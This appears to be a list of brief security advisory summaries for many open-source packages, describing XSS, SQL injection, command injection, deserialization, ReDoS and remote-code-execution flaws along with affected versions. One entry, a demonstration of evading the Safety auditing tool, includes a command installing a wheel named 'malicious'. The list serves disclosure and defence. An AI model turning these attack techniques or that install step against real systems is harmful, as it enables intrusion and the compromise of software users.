Impact: bleach.clean behavior parsing style attributes could result in a regular expression denial of service. Calls to bleach.clean with an allowed tag with an allowed style attribute are vulnerable to ReDoS. For example, ``bleach.clean(…, attributes={'a': 'style'`` … Workarounds: do not allowlist the style attribute in bleach.clean calls; limit input string length. References: https://bugzilla.mozilla.org/show_bug.cgi?id=1623633 https://www.regular-expressions.info/redos.html https://blog.r2c.dev/posts/finding-python-redos-bugs-at-scale-using-dlint-and-r2c/ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6817 Credits: Reported by schwag09 of r2c. For more information: If you have any questions …
In Symfony, some properties of the Exception were not properly escaped when the ErrorHandler rendered its stacktrace. In addition, the stacktrace was displayed in a non-debug configuration. The ErrorHandler now escapes all properties of the exception, and the stacktrace is only displayed in debug configurations.
In symfony/security-http before versions 4.4.7 and 5.0.7, when a Firewall checks an access control rule, it iterates over each rule's attributes and stops as soon as the accessDecisionManager decides to grant access on the attribute, preventing the check of the next attributes that should have been taken into account in a unanimous strategy. The accessDecisionManager is now called with all attributes at once, allowing the unanimous strategy to be applied on each attribute. …
In symfony/security-http, when a Firewall checks an access control rule, it iterates over each rule's attributes and stops as soon as the accessDecisionManager decides to grant access on the attribute, preventing the check of the next attributes that should have been taken into account in a unanimous strategy. The accessDecisionManager is now called with all attributes at once, allowing the unanimous strategy to be applied on each attribute.
The Micronaut HTTP client is vulnerable to HTTP Request Header Injection due to not validating request headers passed to the client.
The Gradle publish plugin is vulnerable to Insertion of Sensitive Information into Log File. When a plugin author publishes a Gradle plugin while running Gradle with the --info log level flag, the Gradle Logger logs an AWS pre-signed URL.
An issue was discovered in USC iLab cereal. Serialization of an (initialized) C/C++ long double variable into a BinaryArchive or PortableBinaryArchive leaks several bytes of stack or heap memory, from which sensitive information (such as memory layout or private keys) can be gleaned if the archive is distributed outside a trusted context.
NetBeans autoupdate does not fully validate code signatures. An attacker could modify the downloaded nbm and include additional code.
In Symfony, when a Response does not contain a Content-Type header, affected versions of Symfony can fall back to the format defined in the Accept header of the request, leading to a possible mismatch between the response content and the Content-Type header. When the response is cached, this can prevent the use of the website by other users.
The NetBeans autoupdate system does not validate SSL certificates and hostnames for https based downloads. This allows an attacker to intercept downloads of autoupdates and modify the download, potentially injecting malicious code.
In Symfony before versions 5.0.5 and 4.4.5, some properties of the Exception were not properly escaped when the ErrorHandler rendered its stacktrace. In addition, the stacktrace was displayed even in a non-debug configuration. The ErrorHandler now escapes all properties of the exception, and the stacktrace is only displayed in debug configurations. This issue is patched in symfony/http-foundation versions 4.4.5 and 5.0.5.
In Elide it is possible for an adversary to "guess and check" the value of a model field they do not have access to assuming they can read at least one other field in the model. The adversary can construct filter expressions for an inaccessible field to filter a collection.
Not affected: deployments on ZEIT Now v2 (https://zeit.co). Not affected: deployments using the serverless target. Not affected: deployments using next export. Affected: users of Next.js below 9.3.2. We recommend that everyone upgrade regardless of whether you can reproduce the issue or not.
All versions of bson are vulnerable to Deserialization of Untrusted Data. The package will ignore an unknown value for an object's _bsotype, leading to cases where an object is serialized as a document rather than the intended BSON type.
bson is vulnerable to Deserialization of Untrusted Data. The package will ignore an unknown value for an object's _bsotype, leading to cases where an object is serialized as a document rather than the intended BSON type.
Azkaban suffers from XXE injection due to invalid handling of XML in validator/XmlValidatorManager.java and user/XmlUserManager.java.
The Kubernetes API server component has been found to be vulnerable to a denial of service attack via successful API requests.
The Kubelet component has been found to be vulnerable to a denial of service attack via the kubelet API, including the unauthenticated HTTP read-only API typically served on port, and the authenticated HTTPS API typically served on port
A URL parsing issue in goog.uri of the Google Closure Library allows an attacker to send malicious URLs to be parsed by the library and return the wrong authority.
VVE-2020-0001: Earlier today, we received a responsible disclosure of a potential issue from @montyly (security researcher at @trailofbits) for Vyper users who make assumptions about what values certain interface types can return. Impact: We determined the issue to be mild and unlikely to be exploited, with an easy workaround while the correct resolution is in process. The issue stems from a number of things, which we will detail here. (1) …
FrozenNode Laravel-Administrator allows unrestricted file upload (and consequently Remote Code Execution) via admin/tips_image/image/file_upload image upload with PHP content within a GIF image that has the .php extension.
http4s has a local file inclusion vulnerability due to URI normalization being applied incorrectly. This vulnerability applies to all users of org.http4s.server.staticcontent.FileService, org.http4s.server.staticcontent.ResourceService and org.http4s.server.staticcontent.WebjarService.
The Jenkins RapidDeploy Plugin does not configure its XML parser to prevent XML external entity (XXE) attacks.
http4s before versions 0.18.26, 0.20.20, and 0.21.2 has a local file inclusion vulnerability. This vulnerability applies to all users of org.http4s.server.staticcontent.FileService, org.http4s.server.staticcontent.ResourceService and org.http4s.server.staticcontent.WebjarService. URI normalization is applied incorrectly. Requests whose path info contain ../ or // can expose resources outside of the configured location. This issue is patched in versions 0.18.26, 0.20.20, and 0.21.2. Note that 0.19.0 is a deprecated release and has never been supported.
Jenkins Azure Container Service Plugin does not configure its YAML parser to prevent the instantiation of arbitrary types, resulting in a remote code execution vulnerability.
Jenkins OpenShift Pipeline Plugin does not configure its YAML parser to prevent the instantiation of arbitrary types, resulting in a remote code execution vulnerability.
AWS Steps Plugin does not configure its YAML parser to prevent the instantiation of arbitrary types, resulting in a remote code execution vulnerability.
In Apache Shiro, when Apache Shiro is used with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.
When using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.
A form validation endpoint in Jenkins Queue cleanup Plugin does not properly escape a query parameter displayed in an error message, resulting in a reflected XSS vulnerability.
Jenkins does not properly escape node labels that are shown in the form validation for label expressions on job configuration pages, resulting in a stored XSS vulnerability exploitable by users able to define node labels.
Jenkins does not set Content-Security-Policy headers for files uploaded as file parameters to a build, resulting in a stored XSS vulnerability.
Jenkins improperly processes HTML content of list view column headers, resulting in a stored XSS vulnerability exploitable by users able to control column headers.
PrestaShop module ps_facetedsearch has a reflected XSS in the url_name parameter.
The Jenkins RapidDeploy Plugin does not escape package names in the table of packages obtained from a remote server, resulting in a stored XSS vulnerability.
Jenkins uses different representations of request URL paths, which allows attackers to craft URLs that allow bypassing CSRF protection of any target URL.
Saml2 Authentication services for ASP.NET (NuGet package Sustainsys.Saml2) has a faulty implementation of Token Replay Detection. Token Replay Detection is an important defence in depth measure for Single Sign On solutions.
Python Auditing Vulnerability: demonstrates how a malicious package can insert a load-time poison pill to avoid detection by tools like Safety. Tools that are designed to find vulnerable packages cannot ever run in the same python environment that they are trying to protect. Usage: install safety, insecure-package, and this package with pip in the same python environment. Order doesn't matter: pip install safety; pip install insecure-package; pip install dist/malicious-0.1-py3-none-any.whl …
When configuring a Conditional OTP Authentication Flow as a post login flow of an IDP, the failure login events for OTP are not being sent to the brute force protection event queue. So BruteForceProtector does not handle these events.
A flaw was found in keycloak. When configuring a conditional OTP Authentication Flow as a post login flow of an IDP, the failure login events for OTP are not being sent to the brute force protection event queue. So BruteForceProtector does not handle these events.
Impact: Anybody using this library to sign with a BIP44 account other than the first account may be affected. If a user is signing with the first account (i.e. the account at index 0), or with the legacy MEW/MyCrypto HD path, they are not affected. The vulnerability impacts cases where the user signs a personal message or transaction without first adding the account. This includes cases where the user has …
PyYAML is susceptible to arbitrary code execution when it processes untrusted YAML files through the full_load method or with the FullLoader loader. Applications that use the library to process untrusted input may be vulnerable to this flaw. An attacker could use this flaw to execute arbitrary code on the system by abusing the python/object/new constructor.
Mozilla Bleach has a mutation XSS in bleach.clean when RCDATA and either svg or math tags are in the allowlist with the keyword argument strip=False.
A carefully crafted or corrupt PSD file can cause excessive memory usage in Apache Tika's PSDParser.
A carefully crafted or corrupt PSD file can cause an infinite loop in Apache Tika's PSDParser.
CodeIgniter allows remote attackers to gain privileges via a modified Email ID to the "Select Role of the User" page. NOTE: A contributor to the CodeIgniter framework argues that the issue should not be attributed to CodeIgniter. Furthermore, the blog post reference shows an unknown website built with the CodeIgniter framework but that CodeIgniter is not responsible for introducing this issue because the framework has never provided a login screen, …
eZ Publish Legacy allows remote attackers to execute arbitrary code by uploading PHP code, unless the vhost configuration permits only app.php execution.
eZ allows remote attackers to execute arbitrary code by uploading PHP code, unless the vhost configuration permits only app.php execution.
An SQL injection vulnerability was found in retrieval of the current username (in libraries/classes/Server/Privileges.php and libraries/classes/UserPassword.php). A malicious user with access to the server could create a crafted username, and then trick the victim into performing specific actions with that user account (such as editing its privileges).
In phpMyAdmin, an SQL injection vulnerability has been discovered where certain parameters are not properly escaped when generating certain queries for search actions in libraries/classes/Controllers/Table/TableSearchController.php. An attacker can generate a crafted database or table name. The attack can be performed if a user attempts certain search operations on the malicious database or table.
A heap-based buffer overflow exists in the function Decompress() located in decompress.c. It can be triggered by sending a crafted file to the gif2h5 binary. It allows an attacker to cause Denial of Service.
An issue was discovered in HDF5. A heap-based buffer over-read exists in the function H5O__layout_decode() located in H5Olayout.c. It allows an attacker to cause Denial of Service.
A NULL pointer dereference exists in the function H5F_get_nrefs() located in H5Fquery.c. It allows an attacker to cause Denial of Service.
A NULL pointer dereference exists in the function H5AC_unpin_entry() located in H5AC.c. It allows an attacker to cause Denial of Service.
An SQL injection vulnerability was discovered where malicious code could be used to trigger an XSS attack through retrieving and displaying results (in tbl_get_field.php and libraries/classes/Display/Results.php). The attacker must be able to insert crafted data into certain database tables, which when retrieved (for instance, through the Browse tab) can trigger the XSS attack.
An open URL redirect via the p parameter in login.php in Centreon allows an attacker to craft a potentially malicious payload to execute unintended behavior.
A prototype pollution vulnerability in fastify-multipart allows an attacker to crash fastify applications when parsing multipart requests by sending a specially crafted request.
Cloud Native Computing Foundation Harbor allows SQL Injection via project quotas in the VMware Harbor Container Registry for the Pivotal Platform.
Cloud Native Computing Foundation Harbor allows SQL Injection via user-groups in the VMware Harbor Container Registry for the Pivotal Platform.
The uppy npm package has a Server-Side Request Forgery (SSRF) vulnerability, which allows an attacker to scan local or external networks or otherwise interact with internal systems.
Server-side request forgery (SSRF) vulnerability in Ghost CMS allows an attacker to scan local or external network or otherwise interact with internal systems.
Local File Inclusion in minPlayCommand.php in Centreon allows an attacker to traverse paths via a plugin test.
A flaw in Centreon's minPlayCommand.php allows an attacker to achieve command injection via a plugin test.
phpBB allows adding an arbitrary Cascading Style Sheets (CSS) token sequence to a page through BBCode.
Cloud Native Computing Foundation Harbor has a Privilege Escalation Vulnerability in the VMware Harbor Container Registry for the Pivotal Platform.
Cloud Native Computing Foundation Harbor allows CSRF in the VMware Harbor Container Registry for the Pivotal Platform.
Code injection vulnerability in blamer may result in remote code execution when the input can be controlled by an attacker.
The Library API in buger jsonparser allows attackers to cause a denial of service (infinite loop) by means of a call to Delete.
In EasyBuild, the GitHub Personal Access Token (PAT) used by EasyBuild for the GitHub integration features (like --new-pr, --from-pr, etc.) is shown in plain text in EasyBuild debug log files.
The GitHub Personal Access Token (PAT) used by EasyBuild for the GitHub integration features (like --new-pr, --from-pr, etc.) is shown in plain text in EasyBuild debug log files. Scope: the log message only appears in the top-level log file, not in the individual software installation logs (see https://easybuild.readthedocs.io/en/latest/Logfiles.html); as a consequence, tokens are not included in the partial log files that are uploaded into a gist when using --upload-test-report in …
Ignite Realtime Openfire allows XSS via the setup/setup-datasource-standard.jsp serverURL parameter.
Ignite Realtime Openfire suffers from a Cross-site Scripting (XSS) vulnerability in the setup/setup-datasource-standard.jsp password parameter.
Ignite Realtime Openfire suffers from a Cross-site Scripting (XSS) vulnerability in the setup/setup-datasource-standard.jsp driver parameter.
In ActionView there is a possible XSS vulnerability in ActionView's JavaScript literal escape helpers. Views that use the j or escape_javascript methods may be susceptible to XSS.
An open redirect exists in the Lesson edit page.
A vulnerability was found in Moodle where tokens used to fetch inline attachments in email notifications were not disabled when a user account was no longer active.
FasterXML jackson-databind mishandles the interaction between serialization gadgets and typing, related to com.caucho.config.types.ResourceRef.
A reflected XSS is possible through fatal error messages.
Ignite Realtime Openfire suffers from a Cross-site Scripting (XSS) vulnerability in the setup/setup-datasource-standard.jsp username parameter.
There is blind XSS reflected in some locations where user email is displayed.
Golang Facebook Thrift servers would not error upon receiving messages declaring containers of sizes larger than the payload. As a result, malicious clients could send short messages which would result in a large memory allocation, potentially leading to denial of service.
OpenCart allows remote authenticated users to conduct XSS attacks via a crafted filename in the user image upload section.
Subrion CMS (and possibly earlier versions) allow CSRF to change the administrator password via the panel/members/edit/1 URI.
In OPC Foundation OPC UA .NET Standard codebase, servers do not create sufficiently random numbers in OPCFoundation.NetStandard.Opc.Ua, which allows man in the middle attackers to reuse encrypted user credentials sent over the network.
In OPC Foundation OPC UA .NET Standard codebase 1.4.357.28, servers do not create sufficiently random numbers in OPCFoundation.NetStandard.Opc.Ua before 1.4.359.31, which allows man in the middle attackers to reuse encrypted user credentials sent over the network.
Umbraco CMS allows an authenticated file upload (and consequently Remote Code Execution) via the Install Package functionality.
Umbraco Cloud allows an authenticated file upload (and consequently Remote Code Execution) via the Install Packages functionality.
Dolibarr ERP/CRM allows SQL Injection.
Dolibarr ERP/CRM allows XSS via the qty parameter to product/fournisseurs.php (product price screen).
An issue was discovered in psd-tools before 1.9.4. The Cython implementation of RLE decoding did not check for malformed PSD input data during decoding to the PIL.Image or NumPy format, leading to a Buffer Overflow.
A flaw was found in the Ansible Engine when the fetch module is used. An attacker could intercept the module, inject a new path, and then choose a new destination path on the controller node.
A flaw was found in Ansible Engine when using Ansible Vault for editing encrypted files. When a user executes ansible-vault edit, another user on the same computer can read the old and new secret, as it is created in a temporary file with mkstemp and the returned file descriptor is closed and the method write_data is called to write the existing secret in the file. This method will delete the …
Sensitive parameters such as passwords and tokens are passed to kubectl on the command line, rather than through an environment variable or an input configuration file. This discloses passwords and tokens in the process list, and the no_log directive of the debug module has no effect, so these secrets are disclosed on stdout and in log files.
yargs-parser could be tricked into adding or modifying properties of Object.prototype using a "__proto__" payload.
When TLS is enabled with ssl-endpoint-identification-enabled set to true, Apache Geode fails to perform hostname verification of the entries in the certificate SAN during the SSL handshake. This could compromise intra-cluster communication using a man-in-the-middle attack.
Contao is vulnerable to XSS when viewing the system log. An unauthenticated attacker can inject a script which is executed when a logged-in backend user views the system log.
Dolibarr ERP/CRM allows XSS because uploaded HTML documents are served as text/html despite being renamed to .noexe files.
Dolibarr ERP/CRM has an Insufficient Filtering issue that can lead to user/card.php XSS.
Codiad Web IDE allows PHP Code injection.
A flaw was found in Ansible Engine when the package or service module is used and the use parameter is not specified. If a previous task is executed by a malicious user, the module that is used can be selected by the attacker via the ansible facts file.
The package integrity validation in yarn contains a TOCTOU vulnerability where the hash is computed before writing a package to cache. It's not computed again when reading from the cache. This may lead to a cache pollution attack.
gulp-styledocco allows execution of arbitrary OS commands. The options argument of the exports function in index.js can be controlled by users without any sanitization.
node-prompt-here allows execution of arbitrary commands. The runCommand() function is called by the getDevices() function in file linux/manager.js, which is required by the index. The value of process.env.NM_CLI in the file linux/manager.js is used to construct the argument of function execSync(), and can be controlled by users without any sanitization.
pulverizr allows execution of arbitrary commands. Within lib/job.js, the variable filename can be controlled by the attacker. The code there uses the variable filename to construct the argument of the exec call without any sanitization. In order to successfully exploit this vulnerability, an attacker will need to create a new file with the same name as the attack command.
gulp-scss-lint allows execution of arbitrary commands. It is possible to inject arbitrary commands to the exec function located in src/command.js via the provided options.
docker-compose-remote-api allows execution of arbitrary OS commands. Within index.js of the package, the variable serviceName passed to the function exec(serviceName, cmd, fnStdout, fnStderr, fnExit) can be controlled by users to provide OS commands without any sanitization.
closure-compiler-stream allows execution of arbitrary commands. The argument options of the exports function in index.js can be controlled by users without any sanitization.
It is possible to inject arbitrary OS commands by passing them into gulp-tape options.
Attackers with access to a notionally invalidated token could obtain a new, working token via the refresh endpoint, because the denylist protection mechanism is incompatible with the token-refresh feature.
The dot package uses Function() to compile templates. This can be exploited by the attacker if they can control the given template or if they can control the value set on Object.prototype.
BookStack before version 0.25.5 has a vulnerability where a user could upload PHP files through image upload functions, which would allow them to execute code on the host system remotely. They would then have the permissions of the PHP process. This most impacts scenarios where non-trusted users are given permission to upload images in any area of the application. The issue was addressed in a series of patches in versions …
In Administrate (rubygem), when sorting by attributes on a dashboard, the direction parameter was not validated before being interpolated into the SQL query. This could present a SQL injection if the attacker were able to modify the direction parameter and bypass ActiveRecord SQL protections. Whilst this does have a high impact, to exploit this you need access to the Administrate dashboards, which we would expect to be behind authentication.
python-docutils allows insecure usage of temporary files.
Apache Commons Configuration uses a third-party library to parse YAML files which by default allows the instantiation of classes if the YAML includes special statements. If a YAML file was loaded from an untrusted source, it could therefore load and execute code out of the control of the host application.
Withdrawn: Duplicate of GHSA-2fch-jvg5-crf6
An XSS issue was discovered in tooltip/tooltip.js in PrimeTek PrimeFaces. In a web application using PrimeFaces, an attacker can provide JavaScript code in an input field whose data is later used as a tooltip title without any input validation.
Any user with access to the CMS can view and delete other users' 2FA devices by going to the correct path. The user does not require special permissions in order to do so. By deleting the other user's device they can disable the target user's 2FA devices and potentially compromise the account if they figure out their password.
Torpedo Query mishandles the LIKE operator in ConditionBuilder.java, LikeCondition.java, and NotLikeCondition.java.
querymen allows modification of object properties. The parameters of exported function handler(type, name, fn) can be controlled by users without any sanitization. This could be abused for Prototype Pollution attacks.
An information disclosure vulnerability exists when Chakra improperly discloses the contents of its memory, which could provide an attacker with information to further compromise the user's computer or data. To exploit the vulnerability, an attacker must know the memory address of where the object was created.
A flaw was found in Ansible: when a password is set with the password argument of the svn module, it is used on the svn command line, disclosing it to other users within the same node. An attacker could take advantage of this by reading the cmdline file for that particular PID in procfs.
A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers.
A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory.
A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory.
A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge (HTML-based).
A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory.
A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory.
A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory.
A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory.
A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory.
A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory.
A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge (HTML-based).
A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers.
An elevation of privilege vulnerability exists when the Windows Language Pack Installer improperly handles file operations, aka 'Windows Language Pack Installer Elevation of Privilege Vulnerability'.
Note this is due to axis2 clustering including a dependency to tomcat which is vulnerable to this issue.
A flaw was discovered in the python-novajoin plugin, all versions up to, excluding 1.1.1, for Red Hat OpenStack Platform. The novajoin API lacked sufficient access control, allowing any keystone authenticated user to generate FreeIPA tokens.
This advisory has been marked as False-Positive and removed.
psutil (aka python-psutil) through 5.6.5 can have a double free. This occurs because of refcount mishandling within a while or for loop that converts system data into a Python object.